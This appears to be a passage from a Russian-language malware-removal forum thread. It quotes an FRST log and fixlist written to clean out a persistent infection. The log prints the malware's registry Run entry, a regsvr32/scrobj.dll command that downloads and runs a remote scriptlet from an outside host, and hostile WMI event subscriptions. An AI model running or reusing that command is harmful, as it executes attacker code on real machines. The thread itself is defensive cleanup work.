O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll
McAfee Security Scan Plus
Spybot - Search & Destroy
Пока деинсталлируйте его.Malwarebytes не запускается все равно
Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e7180c00-1a66-4693-beec-f79094e619a0} <==== ATTENTION (Restriction - IP)
S3 MBAMService; "C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe" [X]
S3 4F9504A71D6D3CF2; \??\C:\Users\Витася\AppData\Local\Temp\435AC690.sys [X] <==== ATTENTION
2019-01-29 23:38 - 2019-01-29 23:38 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-30 12:26 - 2018-10-30 00:45 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2019-01-30 11:54 - 2018-10-30 00:45 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-10-25 04:51 - 2018-12-13 22:24 - 000000084 _____ () C:\Program Files\Common Files\xp.dat
2018-10-25 04:50 - 2019-01-30 09:27 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
EmptyTemp:
Reboot:
End::
не следует доверять
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?
We use cookies and similar technologies for the following purposes:
Do you accept cookies and these technologies?